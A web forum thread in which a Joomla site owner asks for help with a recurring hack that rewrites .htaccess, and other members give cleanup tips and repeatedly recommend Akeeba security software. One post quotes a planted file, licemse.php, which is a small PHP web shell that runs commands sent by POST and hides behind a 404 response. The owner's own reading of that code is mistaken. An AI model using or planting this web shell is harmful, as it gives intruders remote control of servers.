0
Welcome Guest! Login
0 items Join Now

.htaccess changed by hacker daily

Last Post
Search Topic
    • Tango7's Avatar
    • Tango7
    • Rocketeer
    • Posts: 51
    • Thanks: 0

    Re: .htaccess changed by hacker daily

    Posted 8 years 6 months ago
    • Hello David

      Thanks for your input into this issue.

      Quick question..which two lines do you suggest I edit ?

      I tried making the file permission 000 but my site died so put it to 444 when it was 644
    #1291056

  • Re: .htaccess changed by hacker daily

    Posted 8 years 6 months ago
    • Tango7 wrote:
      Anyone know about RSFirewall ? Is that any good and worth the money ?

      If want a solid piece of protection for your site, I strongly urge you to take advantage of the Akeeba Partner Promotion for 20% off and purchase their PRO Bundle. RT offers a discount for members and it is located here: http://www.rockettheme.com/promotions

      For the record, I get NOTHING for recommending this software. I simply won't touch a site unless the owner agrees up front this will be included in their package. It's been that way since I took the plunge in 2006 and I haven't had one hack since then (nor have any of my clients who keep up their subscription).

      In addition, support is STELLAR and this is where your problem would be best directed. If anyone can find your problem, it's Nick at Akeeba. This one incident is worth the investment to get the Akeeba team on YOUR team.

      I'm still following up on this throughout the day as I'm curious to see how it turns out and what happened. In the meantime, protect your site from further intrusions and/or injections by getting Akeeba Pro. It's worth 1,000 times what you pay for it, it keeps you from getting hacked therefore saving your beautiful hair from being pulled out AND you have time to develop, not troubleshoot. Keeps the aspirin bills down as well.
    #1291058

  • Re: .htaccess changed by hacker daily

    Posted 8 years 6 months ago
    • I LOVE a good puzzle. Haha! I'm mainly tossing stuff out there as I find it. You may not want to see all this so tell me if you want me to stop. I'm on a mission at the moment but I can stop, I can, really I can.... well, after we check... and then there's... errrr... back to I CAN stop..?!?!?!?.. maybe not... but I CAN stop thinking out loud in writing if you'd like. ;)

      I strongly urge a phone call to Hostgator. They have strong, high level support for resellers. If you are down, they are losing money so take advantage of that.

      I checked your name servers to find your host at domaintools.com .
      I also did a google search (and a little research) on websitewelcome.com (your nameservers).

      Apparently, websitewelcome.com handles the private name servers (white label domains) for hostgator's private reseller addresses. These servers are also notorious for spam and hacks.

      I found more information here: http://support.hostgator.com/articles/domain-names/what-are-private-name-servers
      Scroll down and read: What Are the Benefits of Having Your Own Name Servers?

      I happen to know that information hasn't changed in several years. Because it comes from an old article, I'd be on the phone with Hostgator to insure the nameserver information is current or, at least, using an alternate??? And then there's the MX records and the SPF setup.

      Here's why.

      I found more info on: http://www.aboutus.com/WebsiteWelcome.com

      Couple the above and the info it contained, I did a search on google for "websitewelcome.com complaints". You try it and you might get scared enough to make that call.

      And now we're back to THE CODE <<<{{{running---screaming---hiding}}}>>>.

      I have no clue exactly HOW the last line works but I know it's referencing a particular sub-folder called "yoursitename/reo". This indicates either one of two things:
    • There's a folder called "reo" off the YourHost/homefiles/public_html file structure you don't know about OR
      it's possible the referenced folder resides elsewhere, like your YourHost/homefiles/reo structure so you don't notice it.

      • In your HOSTING Control Panel, use the file manager to search for the "reo" folder. Back up as far as you can to your Host/HOME file structure... which is behind the /public_html files. Might even pay you to ask your support tech to make sure there isn't a hidden folder full of files you can't see.

      I would certainly go in and rename the .htacess to something like BAK.htacess to put it out of commission. Rename the one supplied by Joomla to see if it works or locks out the redirect. That file already has the proper file permissions so don't change them.
      I'm still trying to wrap my brain around HOW someone can change the .htacess file to begin with.

      Finally, are you a member of ProjectHoneyPot? If not, join. A few minutes spent, a line or two of code and you just might stop this with one slam dunk. https://www.projecthoneypot.org/

      The last time I dealt with something like this was 2007. I have now shared all the tips and tricks you might expect from a neophyte yet I hope you may find one tidbit of knowledge in there somewhere. LOL

      Hang in there and I'll watch your progress... QUIETLY for a while as I have a family calling me now.
    • Last Edit: 8 years 6 months ago by Empowermom. Reason: typo
    #1291060
    • Tango7's Avatar
    • Tango7
    • Rocketeer
    • Posts: 51
    • Thanks: 0

    Re: .htaccess changed by hacker daily

    Posted 8 years 6 months ago
    • Sorry all who have been following this.... I've had a busy week or two and just not found time to deal with this.

      So... I downloaded my entire site to my MAC and Kaspersky started to throw up all sorts of malware warnings from all sorts of places..even roktwittie ? folder..... loads of places.

      So they all got cleaned out so I re-uploaded the files once cleaned but still the URLs are getting generated.

      With the site still on my MAC, I searched the entire directory for admiin.php and found about 10 files in various locations. I've deleted all of those and uploaded the site again.

      On uploading, I noticed a file in the root which has either always been there and I've just been blind to the spelling error, or it's just appeared but it's called: licemse.php and contains the following code:

      <?php
      $server = $_SERVER;

      if(isset($_POST))
      {
      $command = $_POST;
      }
      else
      {
      header('HTTP/1.0 404 Not Found');
      exit;
      }

      exec($command, $output);

      foreach($output as $var)
      {
      echo substr_replace($var, $server, 0, 1)."---end---";
      }
      ?>

      This looks to me (a very none code person) as if it looks for 404 errors on the pages it has generated and then regenerates the code all over again. So, if I delete the admiin.php file or if I amend the .htaccess file, it will look at my site, notice the 404 errors and start all over again....Jeez... how to get rid of this thing. It looks so simple but it has riddled my site.
    #1293043
    • David Goode's Avatar
    • David Goode
    • Preeminent Rocketeer
    • Posts: 17058
    • Thanks: 890
    • Web Designer and Host

    Re: .htaccess changed by hacker daily

    Posted 8 years 6 months ago
    • Hi there,

      That is part of the problem. The file is not part of Joomla and is named to make it harder to notice.

      We had a client who was hacked over Christmas and the hacker just kept coming back. We changed passwords, searched files, did file comparisons, scans with maldet etc. In the end it was quicker to simply start with a clean Joomla and copy and paste content across.

      That may be your only option if you cannot find all of the malicious scripts.

      I wish you luck in this task.

    • Please search forums before posting. Please make sure your post includes the version of the CMS you are using and a link to the problem. Annotations on screenshots can also be helpful to explain problems/goals. Please use the "secure" tab for confidential information
    #1293044

  • Re: .htaccess changed by hacker daily

    Posted 8 years 6 months ago
    • As outlined earlier, this is not a template issue or a Joomla issue. You may or may not receive the ciritical information you seek in this forum. You could do a post to request services from a member, but that's a hit or miss proposition given the time you've invested and are still investing on the problem. And they'll probably charge you for the help.

      So here I say again, there's a darn good reason so many site owners and Joomla vendors swear by Akeeba, including RT. RT members even get a discount for Akeeba. See this page: www.rockettheme.com/promotions

      I suggest you purchase the PRO subscription bundle for a years' worth of security at your fingertips.... and as I mentioned earlier, stellar support. If you want to submit a ticket for their support before the weekend, now would be a good time to subscribe.

      I'm have used this product since it came out. Your investment would be well rewarded far more than the angst you are experiencing at present, you'll have experts at your disposal and it will probably cost far less than you could pay someone to go through all this.

      Get Akeeba.... be happy! (And NO, that is not a paid political announcement. It's based on facts and many years of experience.)

      I hope you get help quickly. I've been there, done that, hate it, don't want to go back to it, and I FEEL your pain. ;)
    #1293270

Time to create page: 0.058 seconds